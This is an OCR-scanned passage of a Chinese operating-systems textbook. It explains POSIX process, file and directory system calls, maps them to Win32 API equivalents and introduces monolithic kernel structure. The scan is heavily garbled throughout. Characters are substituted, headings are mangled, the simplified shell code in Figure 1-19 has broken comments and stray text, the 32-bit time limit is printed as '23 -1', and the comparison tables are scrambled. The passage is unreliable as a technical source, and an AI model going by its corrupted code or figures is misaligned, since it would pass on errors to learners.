目录 和 文件 系统 管理 


s= mkdir(name, mode) 创建 一 个 新 目录 

s = rmdir(name) 删 去 一 个 空 目 录 

s = link(name1, name2) 创建 一 个 新 目录 项 name2， 并 指向 name 1 
s = unlink(name) 删 去 一 个 目录 项 

s = mount(special, name, flag) 安装 一 个 文件 系统 

s = umount(special) 印 载 一 个 文件 系统 


杂 项 


EA PCA 


s = kill(pid, signal) 发 送信 号 给 一 个 进程 


seconds =time(&seconds) 自 1970 年 1 月 1 日 起 的 流逝 时 间 


图 1-18 一 些 重要 的 POSIX 系 统 调 用 。 大 出 蚀 则 返回 代码 s 为 -1。 返 
回 代 码 如 下 : pid 是 进程 的 d，fd 是 文件 描述 符 ，n 是 字 节 数 ，position 是 
在 文件 中 的 偏 移 量 ， 而 seconds 是 流逝 时 间 。 参 数 在 表 中 解释 


从 厂 义 上 看 ， 由 这 些 调用 所 提供 的 服务 确定 了 多 数 操作 系统 应 该 
具有 的 功能 ， 而 在 个 人 计算 机 上 ， 资 源 管理 功能 是 较 弱 的 《至少 与 多 
用 户 的 大 型 机 相 比 较 是 这 样 ) 。 所 包含 的 服务 有 创建 与 终止 进程 ， 创 
建 、 删 除 、 读 出 和 写 入 文件 ， 目 隶 管理 以 及 完成 输入 输出 。 


有 必要 指出 ， 将 POSIX 过 程 映射 到 系统 调用 并 不 是 一 对 一 的 。 
POSIX 标 准 定义 了 构造 系统 所 必须 提供 的 一 套 过 程 ， 但 是 并 没有 规定 
它们 是 系统 调用 ， 是 库 调 用 还 古 其 他 的 形式 。 如 来 不 通过 系统 调用 下 
可 以 执行 一 个 过 程 〈 即 无 须 陷 入 内 核 ) ， 那 么 从 性 能 方面 考虑 ， 它 通 
党 会 在 用 户 空间 中 和 完成。 不过， 多数 POSIX 过 程 确实 进行 系统 调用 ， 
通 单 是 一 个 过 程 直 接 映射 到 一 个 系统 调用 上 “。 在 有 一 些 情形 下 ， 特 别 
征 所 需要 的 过 程 仅仅 是 某 个 调用 的 变 体 时 ， 此 时 一 个 系统 调用 会 对 应 
符 干 个 库 调 用 。 


1.6.1 用 于 进程 管理 的 系统 调用 


在 图 1-18 中 的 第 一 组 调用 处 理 进 程 管理 。 将 有 关 fork (派生 ) 的 讨 
论 作为 本 节 的 开始 是 较为 合适 的 。 在 UNIX 中 ，fork 坪 惟一 可 以 在 
POSIX 创 建 进程 的 途径 。 它 创建 一 个 原 有 进程 的 精确 副本 ， 包 括 所 有 
的 文件 描述 符 ， 寄 存 絮 等 全 部 内 容 。 在 fork 之 后 ， 原 有 的 进程 及 其 副本 
( 父 与 子 ) 束 分 开 了 。 在 fork 时 ， 所 有 的 变量 具有 一 样 的 值 ， 虽然 父 进 
程 的 数据 被 复制 用 以 创建 子 进程 ， 但 是 其 中 一 个 的 后 续 变 化 并 不 会 影 


啊 到 另 一 个 。 (由 父 进程 和 子 进程 共享 的 程序 正文 ， 是 不 可 改变 

的 。) fork 调 用 返回 一 个 值 ， 在 子 进程 中 该 值 为 零 ， 并 且 等 于 子 进 程 的 
进程 标识 符 ， 或 等 于 父 进程 中 的 PID。 使 用 被 返回 的 PID， 就 可 以 在 两 
个 进程 中 看 出 哪 一 个 是 父 进程 ， 哪 一 个 古 子 进程 。 


多 数 情 形 下 ， 在 fork 之 后 ， 子 进程 需要 执行 与 父 进程 不 同 的 代码 。 
这 里 考虑 shell 的 情形 。 它 从 终端 读 取 命令 ， 创 建 一 个 子 进程 ， 等 待 该 
子 进程 执行 命令 ， 在 该 子 进程 终止 时 ， 读 入 下 一 条 命令 。 为 了 等 待 子 
进程 结束 ， 父 进程 执行 一 个 waitpid 系 统 调 用 ， 它 只 是 等 待 ， 直 至 子 进 
程 终止 〈 若 有 多 个 子 进 程 存在 的 话 ， 则 直至 任何 一 个 子 进程 终止 ) 。 
waitpid 可 以 等 待 一 个 特定 的 子 进 程 ， 或 者 通过 将 第 一 个 参数 设 为 -1 的 方 
式 ， 从 而 等 待 任何 一 个 老 的 子 进程 。 在 waitpid 完 成 之 后 ， 将 把 第 二 个 
参数 statloc 所 指向 的 地 址 设置 为 子 进程 的 退出 状态 (正常 或 异常 终止 以 
及 退出 值 ) 。 有 各 种 可 使 用 的 选项 ， 它 们 由 第 三 个 参数 确定 。 


现在 考 虚 shell 如 何 使 用 fork。 在 键入 一 条 命令 后 ，shell 创 建 一 个 新 
的 进程 。 这 个 子 进程 必须 执行 用 户 的 命令 。 通 过 使 用 execve 系 统 调用 可 
以 实现 这 一 点 ， 这 个 系统 调用 会 引起 其 整个 核心 映像 被 一 个 文件 所 震 
代 ， 该 文件 由 第 一 个 参数 给 定 。 (实际 上 ， 该 系统 调用 自身 是 exec 系 统 
调用 ， 但 是 若干 个 不 同 的 库 过 程 使 用 不 同 的 参数 和 稍 有 差别 的 名 称 调 
用 该 系统 调用 。 在 这 里 ， 我 们 都 把 它们 祝 为 系统 调用 。) 在 图 1-19 中 ， 
用 一 个 高 度 简化 的 shell 说 明 fork、waitpid 以 及 execve 的 使 用 。 


#define TRUE 1 


WEIR KF 
while (TRUE) { I Sethe 
type_prompt( ); Ik 在 屏幕 上 显示 提示 符 */ 
read_command(command, parameters); /x 从 终端 读 取 输入 */ 


if (fork( ) != 0) { fe 派生 子 进程 状 


be 父 代码 */ 
waitpid(—1, &status, 0); fe 等 待 子 进程 退出 */ 
else { 
Pe 子 代码 */ 
execve(command, parameters, 0); I 执行 命令 */ 


} 


} 


图 1-19 一 条 shell (在 本 书 中 ，TRUE 都 被 定义 为 1) 


在 最 一 般 情形 下 ，execve 有 三 个 参数 ， 将 要 执行 的 文件 名 称 ， 一 个 
指向 变量 数组 的 指针 ， 以 及 一 个 指向 环境 数组 的 指针 。 这 里 对 这 些 参 
数 做 一 个 简要 的 说 明 。 各 种 库 例 程 ， 包 括 execl、execv、execle 以 及 
execve， 可 以 允许 略 挥 参数 或 以 各 种 不 同 的 方式 给 是。 在 本 书 中 ， 我 们 
在 所 有 涉及 的 地 方 使 用 exec 搞 述 系 统 调用 。 


下 面 考 虑 诸如 


cp file1 file2 


的 命令 ， 该 命令 将 fle1l 复 制 到 file2。 在 shell 创 建 进程 之 后 ， 该 子 进 
程 定 位 和 执行 文件 p， 并 将 源 文件 名 和 目标 文件 名 传递 给 它 。 


cp 主 程序 (以 及 多 数 其 他 C 程 序 的 主 程序 ， 都 有 声明 


main(argc, argv, envp) 


其 中 argc 是 该 命令 行内 有 关 参 数 数目 的 计数 器 ， 包 括 程 序 名 称 。 例 
如 ， 上 面 的 例子 中 ，argc 为 3。 


第 二 个 参数 argv 是 一 个 指向 数组 的 指针 。 该 数组 的 元 素 i 是 指向 该 
命令 行 第 个 字 串 的 指针 。 在 本 例 中 ，argv[0] 指 向 字 串 “cp”,argv[1] 指 向 
字符 串 “file1”，argv[2] 指 向 字符 串 “file2”。 


main 的 第 三 个 参数 envp 指 向 环境 的 一 个 指针 ， 该 环境 是 一 个 数 
组 ， 含 有 name=value 的 赋值 形式 ， 用 以 将 诸如 终端 类 型 以 及 根 目 录 等 
言 息 传 送 给 程序 。 还 有 供 程序 可 以 调用 的 库 过 程 ， 用 来 取得 环境 变 
量 ， 这 些 变量 通 和 并 用 来 确定 用 户 和 希望 如 何 完成 特定 的 任务 (例如 ， 使 
用 默认 打印 机 ) 。 在 图 1-19 中 ， 没 有 环境 参数 传递 给 子 进 程 ， 所 以 
execve 的 第 三 个 参数 为 零 。 


如 采访 者 认为 exec 过 于 复杂 ， 那 么 也 不 要 失望 。 这 征 在 POSIX 的 全 
部 (语义 上 ) 系统 调用 中 最 复杂 的 一 个 ， 其 他 的 都 非常 简单 。 作 为 一 
个 简单 例子 ， 考 虑 exit， 这 是 在 进程 完成 执行 后 应 执行 的 系统 调用 。 这 
个 系统 调用 有 一 个 参数 ， 退 出 状态 (0 至 255) ， 该 参数 通过 waitpid 系 
统 调用 中 的 statloc 返 回 给 父 进 程 。 


在 UNIX 中 的 进程 将 其 存储 空间 划分 为 三 段 : 正文 段 〈 如 程序 代 
码 ) 、 数 据 段 (如 变量 ) 以 及 堆栈 段 。 数 据 段 向 上 增长 而 堆栈 向 下 增 


长 ， 如 图 1-20 所 示 。 夹 在 中 间 的 是 未 使 用 的 地 址 空间 。 堆 栈 在 需要 时 目 
动 地 加 中 间 增 长 ， 不 过 数据 段 的 扩展 是 显 式 地 通过 系统 调用 brks 埋 行 
的 ， 在 数据 段 扩充 后 ， 该 系统 调用 指定 一 个 新 地 址 。 但 是 ， 这 个 调用 
不 是 POSIX 标 准 中 定义 的 调用 ， 对 于 存储 囊 的 动态 分 配 ， 我 们 鼓励 程 
序 员 使 用 malloc 库 过 程 ， 而 malloc 的 内 部 实现 则 不 是 一 个 适合 标准 化 的 
主题 ， 因 为 几乎 没有 程序 员 直 接 使 用 它 ， 我 们 有 理由 怀疑 ， 会 有 什么 
人 注意 到 brk 实 际 不 是 属于 POSIX 的 。 


地 址 (十 六 进 制 》 
FFFF 


0000 


图 1-20 进程 有 三 段 : 正文 段 、 数 据 段 和 堆栈 段 


1.6.2 ”用 于 文件 管理 的 系统 调用 


许多 系统 调用 与 文件 系统 有 关 。 本 小 市 讨论 在 单个 文件 上 的 操 
作 ，1.6.3 廊 将 讨论 与 目录 和 整个 文件 系统 有 关 的 内 容 。 


要 读 写 一 个 文件 ， 先 要 使 用 open 打 开 该 文件 。 这 个 系统 调用 通过 
绝对 路 径 名 或 指向 工作 目录 的 相对 路 径 名 指定 要 打开 文件 的 名 称 ， 而 
代码 O_ RDONLY、O_WRONLY 或 O0 RDWR 的 含义 分 别 是 读 、 写 或 两 
者 。 为 了 创建 一 个 新 文件 ， 使 用 O_CREAT 参 数 。 然 后 可 使 用 返回 的 文 
件 描 述 符 进行 读 写 操作 。 接 着 ， 可 以 用 close 关 闭 文 件 ， 这 个 调用 使 得 
该 文件 描述 符 在 后 续 的 open 中 被 再 次 使 用 。 


量 无 疑问 ， 最 种 用 的 调用 是 read 和 write。 我 们 在 前 面 已 经 讨论 过 
read。write 具 有 与 read 相 同 的 参数 。 


尽管 多 数 程序 频 楷 地 读 写 文件 ， 但 是 仍 有 一 些 应 用 程序 需要 能 够 
随机 访问 一 个 文件 的 任意 部 分 。 与 每 个 文件 相关 的 是 一 个 指向 文件 当 
前 位 置 的 指针 。 在 顺序 读 ( 写 ) 时 ， 该 指针 通常 指向 要 读 出 ( 写 入 ) 
的 下 一 个 字 节 “。lseek 调 用 可 以 改变 该 位 置 指针 的 值 ， 这 样 后 续 的 read 
或 write 调用 就 可 以 在 文件 的 任何 地 方 开始 。 


lseek 有 三 个 参数 : 第 一 个 是 文件 的 摘 述 符 ， 第 二 个 是 文件 位 置 ， 
第 三 个 说 明 该 文件 位 置 是 相对 于 文件 起 始 位 置 、 当 前 位 置 ， 还 征文 件 
的 结尾 。 在 修改 了 指针 之 后 ，lseek 所 返回 的 值 是 文件 中 的 绝对 位 置 。 


UNIX 为 每 个 文件 保存 了 该 文件 的 类 型 (普通 文件 、 特 殊 文 件 、 目 
KE) ， 大 小 ， 最 后 修改 时 间 以 及 其 他 信息 。 程 序 可 以 通过 stat 系 统 调 
用 得 看 这 些 信息 。 第 一 个 参数 指定 了 要 被 检查 的 文件 ， 第 二 个 参数 是 
一 个 指针 ， 该 指针 指 回 用 来 存放 这 些 信息 的 结构 。 对 于 一 个 打开 的 文 
件 而 言 ，fstat 调 用 完成 同样 的 工作 。 


16.3 Fay Ase eee AS A 


本 市 我 们 讨论 与 目录 或 整个 文件 系统 有 关 的 某 些 系 统 调用 ， 而 不 
征 1.6.2 世 中 与 一 个 特定 文件 有 天 的 系统 调用 。mkdir 和 rmdir 分 别 用 于 创 
建 和 删除 空 目录 。 下 一 个 调用 是 link 。 它 的 作用 是 允许 同一 个 文件 以 两 
个 或 多 个 名 称 出 现 ， 多 数 情 形 下 是 在 不 同 的 目录 中 这 样 做 。 它 的 典型 
应 用 是 ， 在 同一 个 开发 团队 中 允许 阁 干 个 成 员 共 至 一 个 共同 的 文件 ， 
他 们 之 中 的 每 个 人 都 在 目 己 的 目录 中 有 该 文件 ， 但 可 能 采用 的 古 不 同 
的 名 称 。 共 享 一 个 文件 ， 与 每 个 团队 成 员 都 有 一 个 私 用 副本 并 不 是 同 
一 件 事 ， 因 为 共享 文件 意味 着 ， 任 何 成 员 所 做 的 修改 都 立即 为 其 他 成 
员 所 见 一 一 只 有 一 个 文件 存在 。 而 在 复制 了 一 个 文件 的 多 个 副本 之 
后 ， 对 其 中 一 个 副本 所 进行 的 修改 并 不 会 影响 到 其 他 的 副本 。 


为 了 考察 link 是 如 何 工作 的 ， 考 虑 图 1-21a 中 的 情形 。 有 两 个 用 户 ， 
ast 和 jim， 每 个 用 户 都 有 一 些 文件 的 目 永 。 知 ast 现 在 执行 一 个 含有 系统 
调用 的 程序 


link("/usr/jim/memo","usr/ast/note"); 


在 jim 目 录 中 的 文件 memo， 以 文件 名 note 进 入 ast 的 目录 。 之 
后 ，/usr/jim/memo 和 和 /usr/ast/note 都 引用 相同 的 文件 。 顺 便 提 及 ， 用 户 是 


将 日 录 你 存在 /usr、/user、/home 还 是 其 他 地 方 ， 则 完全 取决 于 本 地 系 


统管 理 员 的 决定 。 


理解 link 是 如 何 工 作 的 也 许 有 助 于 读者 看 清 其 作用 。 在 UNIX 中 ， 
每 个 文件 都 有 惟一 的 编号 ， 即 i- 编 号 ， 用 以 标识 文件 。 该 i- 编 号 是 对 i- 节 
点 表格 的 一 个 引用 ， 它 们 一 一 对 应 ， 说 明 该 文件 的 拥有 者 ， 人 磁盘 块 的 
位 置 等 。 一 个 目录 就 是 包含 了 (i- 编 号 ，ASCII 名 称 ) 对 集合 的 一 个 文 
件 。 在 UNIX 的 第 一 个 版 本 中 ， 每 个 目录 项 有 16 个 字 太 一 一 2 个 字 节 用 
于 i- 编 号，14 个 字 节 用 于 名 称 。 现 在 为 了 支持 长 文件 名 ， 采 用 了 更 复杂 
的 结构 ， 但 是 ， 在 概念 上 ， 目 录 仍 然 是 (i- 编 号 ，ASCII 名 称 ) 对 的 一 
个 集合 。 在 图 1-21 中 ，mail 为 i- 编 号 16， 等 等 。link 所 做 的 只 是 利用 某 个 
己 有 文件 的 i- 编 号 ， 创 建 一 个 新 目录 项 (也 许 用 一 个 新 名 称 ) 。 在 图 1- 
21b 中 两 个 目录 项 有 相同 的 i- 编 号 (70) ， 从 而 指向 同一 个 文件 。 如 果 
其 中 某 一 个 文件 后 来 被 移 走 了 ， 使 用 unlink 系 统 调用 ， 可 以 保留 另 一 
个 。 如 果 两 个 都 被 移 走 了 ，UNIX 00 看 到 尚 存在 的 文件 没有 目录 项 (i- 
节点 中 的 一 个 域 记录 着 指向 该 文件 的 目录 项 ) ， 就 会 把 该 文件 从 磁盘 
中 移 去 。 


/usr/ast /usr/jim /usr/ast /usr/jim 


a) b) 


图 1-21 a) 将 /usr/jim/memo 链 接 到 ast 目 隶 之 前 的 两 个 目录 ; bE REZ 
EAS Be 


IZAJ 


正如 我 们 已 经 叙述 过 的 ，mount 系 统 调用 允许 将 两 个 文件 系统 合 
成 为 一 个 。 通 常 的 情形 是 ， 在 硬盘 上 的 根 文件 系统 含有 常用 命令 的 二 
进 制 (可 执行 版 和 其 他 常用 的 文件 。 用 户 可 在 CD-ROM 驱 动 器 中 插 
入 包含 有 需要 读 入 文件 的 CD-ROM 盘 。 


通过 执行 mount 系 统 调 用 ， 可 以 将 一 个 CD-ROM 文 件 系统 添加 到 根 
文件 系统 中 ， 如 图 1-22 所 示 。 完 成 安装 操作 的 典型 C 语 句 为 


mount ("/dev/fd0", "/mnt",0); 


bin dev lib mnt usr iS 
b) 


a) 
图 1-22 aA CAR; b) 安 装 后 的 文件 系统 
这 里 ， 第 一 个 参数 是 驱动 器 0 的 块 特殊 文件 名 称 ， 第 二 个 参数 是 要 
被 安装 在 树 中 的 位 置 ， 第 三 个 参数 说 明 将 要 安装 的 文件 系统 是 可 读 写 


的 还 是 只 读 的 。 


在 mount 调 用 之 后 ， 张 动 磊 0 上 的 文件 可 以 使 用 从 根 目 永 开始 的 路 
径 或 工作 目录 路 径 ， 而 不 用 考虑 文件 在 哪个 驱动 右上 。 事 实 上 ， 第 二 
个 、 第 三 个 以 及 第 四 个 驱动 器 也 可 安装 在 树 上 的 任何 地 方 。mount 调 用 
使 得 把 可 移动 介质 都 集中 到 一 个 文件 层次 中 成 为 可 能 ， 而 不 用 考虑 文 
件 在 哪个 驱动 器 上 。 尽 管 这 是 个 CD-ROM 的 例子 ， 但 是 也 可 以 用 同样 
的 方法 安装 硬盘 或 者 硬盘 的 一 部 分 ( 常 称 为 分 区 或 次 级 设备 ) ， 外 部 
硬盘 和 USB 强 也 一 样 。 当 不 再 需要 一 个 文件 系统 时 ， 可 以 用 umount 系 
统 调用 和 印 载 之 。 


16.4 各 种 系统 调用 


有 各 种 的 系统 调用 。 这 里 介绍 系统 调用 中 的 一 部 分 。chdir 调 用 改 
变 当 前 的 工作 目录 。 在 调用 


chdir("/usr/ast/test"); 


之 后 ， 打 开 xyz 文 件 ， 会 打开 /usrasttesUxyz。 工 作 目 孙 的 概念 消 
除了 总 是 键入 〈 长 ) 绝对 路 径 名 的 需要 。 


在 UNIX 中 ， 每 个 文件 有 一 个 保护 模式 。 该 模式 包括 针对 所 有 者 、 
组 和 其 他 用 户 的 读 - 写 -执行 位 。chmod 系 统 调用 可 以 改变 文件 的 模式 。 
例如 ， 要 使 一 个 文件 对 除了 所 有 者 之 外 的 用 户 只 读 ， 可 以 执行 


chmod("file" ,0644 ) ; 


ki 系统 调用 供用 户 或 用 户 进程 发 送信 号 用 。 大 一 个 进程 准备 好 捕 
捉 一 个 特定 的 信号 ， 那 么 ， 在 信号 到 来 时 ， 运 行 一 个 信号 处 理 程序 。 
如 果 该 进程 没有 准备 好 ， 那 么 信号 的 到 来 会 杀 掉 该 进程 (此 调用 名 称 
FEHR) 


POSIX 定 义 了 若干 处 理 时 间 的 过 程 。 例 如 ，time 以 秒 为 单位 返回 
当前 时 间 ，0 对 应 着 1970 年 1 月 1 日 午夜 (从 此 日 开始 ， 没 有 结束 ) 。 在 


一 台 32 位 字 的 计算 机 中 ，time 的 最 大 值 是 23 -1 秒 (假设 是 无 符号 整 
数 ) 。 这 个 数字 对 应 136 年 多 一 点 。 所 以 在 2106 年 ，32 位 的 UNIX 系 统 
会 发 狂 ， 与 在 2000 年 造成 对 世界 计算 机 严重 破坏 的 知名 的 Y2K 问 题 是 
类 似 的 。 如 果 读 者 现在 有 32 位 UNIX 系 统 ， 建 议 在 2106 年 之 前 的 某 时 刻 
更 换 为 64 位 的 系统 。 


1.6.5 Windows Win32 API 


到 目前 为 止 ， 我们 主要 讨论 的 是 UNIX 系 统 。 现 在 简要 地 考察 
Windows。Windows 和 UNIX 的 主要 差别 在 于 编程 方式 。 一 个 UNIX 程 序 
包括 做 各 种 处 理 的 代码 以 及 从 事 完成 特定 服务 的 系统 调用 。 相 反 ， 一 
个 Windows 程 序 通常 是 一 个 事件 驱动 程序 。 其 中 主 程 序 等 待 某 些 事件 发 
生 ， 然 后 调用 一 个 过 程 处 理 该 事件 。 典 型 的 事件 包括 被 融 击 的 键 、 移 
动 的 鼠标 、 被 按 下 的 鼠标 或 插入 的 CD-ROM。 调 用 事件 处 理 程序 处 理 
事件 ， 刷 新 屏幕 ， 并 更 新 内 部 程序 状态 。 总 之 ， 这 是 与 UNIX 不 同 的 程 
序 设计 风格 ， 由 于 本 书 专注 于 操作 系统 的 功能 和 结构 ， 这 些 程序 设计 
方式 上 的 差异 就 不 过 多 涉及 了 。 


当然 ， 在 Windows 中 也 有 系统 调用 。 在 UNIX 中 ， 系 统 调用 (如 
read) 和 系统 调用 所 使 用 的 库 过 程 (如 read) 之 间 几 乎 是 一 一 对 应 的 关 
系 。 换 句 话 说， 对 于 每 个 系统 调用 ， 差 不 多 就 涉及 一 个 被 调用 的 库 过 
程 ， 如 图 1-17 所 示 。 此 外 ，POSIX 有 约 100 个 过 程 调用 。 


在 Windows 中 ， 情 况 束 大 不 相同 了 。 首 先 ， 库 调用 和 实际 的 系统 调 
用 是 几乎 不 对 应 的 。 微 软 定 义 了 一 套 过 程 ， 称 为 应 用 编程 接口 
(Application Program Interface, Win32 API) ， 程 序 员 用 这 套 过 程 获得 
操作 系统 的 服务 。 从 Windows 95 开 始 的 所 有 Windows 版 本 都 (或 部 分 ) 
支持 这 个 接口 。 由 于 接口 与 实际 的 系统 调用 不 对 应 ， 微 软 保留 了 随 着 


时 间 (甚至 随 着 版 本 到 版 本 ) 改变 实际 系统 调用 的 能 力 ， 防 止 使 已 有 
的 程序 失效 。 由 于 Windows 2000、Windows XP 和 Windows Vista 中 有 许 
多 过 去 没有 的 新 调用 ， 所 以 究竟 Win32 是 由 什么 构成 的 ， 这 个 问题 的 答 
案 仍然 是 含混 不 清 的 。 在 本 节 中 ，Win32 表 示 所 有 Windows 版 本 都 支持 
的 接口 。 


Win32 API 调 用 的 数量 是 非常 大 的 ， 数 量 有 数 千 个 。 此 外 ， 尺 管 其 
中 许多 确实 涉及 系统 调用 ， 但 有 一 大 批 Win32 API 完 全 是 在 用 户 空 间 进 
行 。 结 果 ， 在 Windows 中 ， 不 可 能 了 解 哪 一 个 是 系统 调用 (如 由 内 核 完 
Bi) ， 哪 一 个 只 是 用 户 空 间 中 的 库 调 用 。 事 实 上 ， 在 某 个 版 本 中 的 一 
个 系统 调用 ， 会 在 另 一 个 不 同 版 本 中 的 用 户 空间 中 执行 ， 或 者 相反 。 
当 我 们 在 本 书 中 讨论 Windows 的 系统 调用 时 ， 将 使 用 Win32 过 程 (在 合 
适 之 处 ) ， 这 是 因为 微软 保证 : 随 着 时 间 流 逝 ，Win32 过 程 将 保持 稳 
定 。 但 是 读者 有 必要 记 住 ， 它 们 并 不 全 都 是 系统 调用 ( 即 陷入 到 内 核 
A 


Win32 API 中 有 大 量 的 调用 ， 用 来 管理 视窗 、 几 何 图 形 、 文 本 、 字 
型 、 滚 动 条 、 对 话 框 、 菜 单 以 及 GUI 的 其 他 功能 。 为 了 使 图 形 子 系统 在 
内 核 中 运行 〈《 某 些 Windows 版 本 中 确实 是 这 样 ， 但 不 是 所 有 的 版 本 ) ， 
需要 系统 调用 ， 否 则 只 有 库 调 用 。 在 本 书 中 是 否 应 该 讨论 这 些 调用 
呢 ? 由 于 它们 并 不 是 同 操作 系统 的 功能 相关 ， 我 们 还 是 决定 不 讨论 它 
们 ， 尽 管 它们 会 在 内 核 中 运行 。 对 Win32 API 有 兴趣 的 读者 应 该 参阅 一 


些 书 籍 中 的 有 关内 容 ， (例如 ，Hart，1997; Rector 和 Newcomer， 


1997; Simon, 1997) 。 


我 们 在 这 里 介绍 所 有 的 Win32 API， 不 过 这 不 是 我 们 关心 问题 的 所 
在 ， 所 以 我 们 做 了 一 些 限制 ， 只 将 那些 与 岁 1-18 中 UNIX 系 统 调用 大 致 
对 应 的 Windows 调 用 列 在 图 1-23 中 。 


Win32 说 H 


fork CreateProcess 


waitpid | WaitForSingleObject 
(none) 

[exit | ExitProcess 
‘open | CreateFile 


close CloseHandle 
ReadFile 
WriteFile 
SetFilePointer 
stat GetFileAttributesEx 


CreateDirectory 


link (none) 
mount | (none) 


umount | (none) 


chdir SetCurrentDirectory 


oe EE 
可 等 待 一 个 进程 退出 


CreateProcess = fork + execve 


创建 一 个 文件 或 打开 一 个 已 有 的 文件 
关闭 一 个 文件 

从 一 个 文件 读数 据 
把 数据 写 入 一 个 文件 
移动 文件 指针 
取得 文件 的 属性 
创建 一 个 新 目录 
删除 一 个 空 目 录 
Win32 不 支持 link 
毁 掉 一 个 已 有 的 文件 
Win32 不 支持 mount 
Win32 不 支持 umount 
改变 当前 工作 目录 
Win32 不 支持 安全 性 (但 NT 支持 ) 
Win32 不 支持 信号 

获得 当前 时 间 


read 


GetLocalTime 


图 1-23 与 图 1-18 中 UNIX 调 用 大 致 对 应 的 win32 ” API 调用 


下 面 简 要 地 说 明 一 下 图 1-23 中 表格 的 内 容 。CreateProcess 为 创建 一 
个 新 进程 ， 它 把 UNIX 中 的 fork 和 execve 结 合 起 来 。 它 有 许多 参数 用 来 
指定 新 创建 进程 的 性 质 。Windows 中 没有 类 似 UNIX 中 的 进程 层次 ， 所 
以 不 存在 父 进 程 和 子 进程 的 概念 。 在 进程 创建 之 后 ， 创 建 者 和 被 创建 
者 是 平等 的 。 WaitForSingleObject 用 于 等 待 一 个 事件 ， 等 待 的 事件 可 以 
是 多 种 可 能 的 事件 。 如 果 有 参数 指定 了 某 个 进程 ， 那 么 调用 者 等 待 所 
指定 的 进程 退出 ， 这 通过 使 用 ExitProcess 完 成 。 


接着 的 六 个 调用 进行 文件 操作 ， 在 功能 上 和 它们 的 UNIX 对 应 调用 
类 似 ， 尽 管 在 参数 和 细 市 上 它们 都 是 不 同 的 。 和 在 UNIX 中 一 样 ， 文 件 
可 被 打开 、 关 闭 和 写 入 。 SetFilePointer 以 及 GetFileAttributesEx 调 用 设置 
文件 的 位 置 并 取得 文件 的 一 些 属性 。 


Windows 中 有 目录 ， 目 录 可 以 分 别 用 CreateDirectory 以 及 
RemoveDirectory API 调 用 创建 和 删 去 。 也 有 对 当前 目录 的 标记 ， 这 可 
以 通过 SetCurrentDirectory 来 设置 。 使 用 GetLocalTime 可 获得 当前 时 
间 。 


Win32 接 口中 没有 文件 的 链接 、 文 件 系统 的 安装 、 安 全 属性 或 信 
号 ， 所 以 对 应 于 UNIX 中 的 这 些 调用 就 不 存在 了 。 当 然 ，Win32 中 也 有 
大 量 的 在 UNIX 中 不 存在 的 其 他 调用 ， 特 别 是 管理 GUI 的 种 种 调用 。 不 
过 在 Windows Vista 中 有 了 精心 设计 的 安全 系统 ， 而 且 也 支持 文件 的 链 
接 。 


也 许 有 必要 对 Win32 做 一 个 最 后 的 说 明 。Win32 并 不 是 非常 统一 的 
或 有 一 致 的 接口 。 其 主要 原因 是 由 于 Win32 需 要 与 早期 的 在 Windows 
3.x 中 使 用 的 16 位 接口 向 后 兼容 。 


1.7 ”操作 系统 结构 


我 们 已 经 分 析 了 操作 系统 的 外 部 〈 如 ， 程 序 员 接 口 ) ， 现 在 是 分 
析 其 内 部 的 时 候 了 。 在 下 面 的 小 节 中 ， 为 了 对 各 种 可 能 的 方式 有 所 了 
解 ， 我 们 将 考察 已 经 竹 试 过 的 六 种 不 同 的 结构 设计 。 这 样 做 并 没有 穷 
尽 各 种 结构 方式 ， 但 是 至 少 给 出 了 在 实践 中 已 经 试验 过 的 一 些 设计 思 
想 。 这 六 种 设计 是 ， 单 体系 统 、 层 次 系统 、 微 内 核 、 客 户 机 -服务 絮 系 


统 、 虚 拟 机 和 exokernels 等 。 


1.7.1 BRAG 


到 目前 为 止 ， 在 多 数 第 见 的 组 织 形 式 的 处 理 方式 中 ， 全 部 操作 系 
统 在 内 核 态 中 以 单一 程序 的 方式 运行 。 整 个 操作 系统 以 过 程 集合 的 方 
式 编写 ， 链 接 成 一 个 大 型 可 执行 二 进 制 程序 。 使 用 这 种 技术 ， 系 统 
每 个 过 程 可 以 目 由 调用 其 他 过 程 ， 只 要 后 者 提供 了 前 者 所 需要 的 一 些 
有 用 的 计算 工作 。 这 些 可 以 不 受 限 制 彼此 调用 的 成 干 个 过 程 ， 第 音 导 
致 出 现 一 个 笨拙 和 难于 理解 的 系统 。 


在 使 用 这 种 处 理 方式 构造 实际 的 目标 程序 时 ， 首 先 编译 所 有 单个 
的 过 程 ， 或 者 编译 包含 过 程 的 文件 ， 然 后 通过 系统 链接 程序 将 它们 链 
接 成 单一 的 目标 文件 。 依 靠 对 信息 的 隐藏 处 理 ， 不 过 在 这 里 实际 上 十 


(相反 的 构造 中 有 模块 或 
只 能 通过 正式 设计 的 入 口 点 


不 存在 的 ， 每 个 过 程 对 其 他 过 程 都 是 可 见 的 
包 ， 其 中 多 数 信息 隐藏 在 模块 之 中 ， 而 且 
实现 模块 的 外 部 调用 ) 。 


但 是 ， 即 使 在 单 体系 统 中 ， 也 可 能 有 一 些 结构 存在 。 可 以 将 参数 
放置 在 良好 定义 的 位 置 (如 ， 栈 ) ， 通 过 这 种 方式 ， 向 操作 系统 请 求 
所 能 提供 的 服务 (系统 调用 ) ， 然 后 执行 一 个 陷阱 指令 。 这 个 指令 将 
机 器 从 用 户 态 切换 到 内 核 态 并 把 控制 传递 给 操作 系统 ， 如 图 1-17 中 第 6 
步 所 示 。 然 后 ， 操 作 系 统 取出 参数 并 且 确 定 应 该 执行 哪 一 个 系统 调 
用 。 随 后 ， 它 在 一 个 表格 中 检索 ， 在 该 表格 的 k 模 中 存放 着 指向 执行 系 
统 调用 k 过 程 的 指针 (图 1-17 中 第 7 步 ) 。 


对 于 这 类 操作 系统 的 基本 结构 ， 有 着 如 下 结构 上 的 建议 : 
1) 需 要 一 个 主 程序 ， 用 来 处 理 服 务 过 程 请 求 。 
2) 需 要 一 套 服务 过 程 ， 用 来 执行 系统 调用 。 


3) 需 要 一 套 实 用 过 程 ， 用 来 辅助 服务 过 程 。 在 该 模型 中 ， 每 一 个 系 
统 调用 都 通过 一 个 服务 过 程 为 其 工作 并 运行 之 。 要 有 一 组 实用 程序 来 
完成 一 些 服 务 过 程 所 需要 用 到 的 功能 ， 如 从 用 户 程 序 取 数据 等 。 可 将 
各 种 过 程 划分 为 一 个 三 层 的 模型 ， 如 图 1-24 所 示 。 


服务 过 程 


实用 过 程 


图 1-24 简单 的 单 体系 统 结构 模型 


除了 在 计算 机 初 局 时 所 小 载 的 核心 操作 系统 外 ， 许 多 操作 系统 


持 可 装载 的 扩展 ， 诸 如 WO 设备 驱动 和 文件 系统 。 这 些 部 件 可 以 按照 需 
要 载 入 。 


